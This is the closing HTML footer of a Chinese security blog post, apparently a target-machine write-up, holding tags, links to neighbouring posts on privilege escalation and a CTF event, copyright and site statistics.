    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E9%9D%B6%E6%9C%BA-wp/" rel="tag"># 靶机 wp</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/10/09/%E6%8F%90%E6%9D%83-%E5%9F%BA%E7%A1%80%E7%AF%87/" rel="prev" title="提权_基础篇">
                  <i class="fa fa-angle-left"></i> 提权_基础篇
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/10/11/%E7%BE%8A%E5%9F%8E%E6%9D%AF/" rel="next" title="羊城杯">
                  羊城杯 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">hllttz</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">383k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">5:49</span>
  </span>
</div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
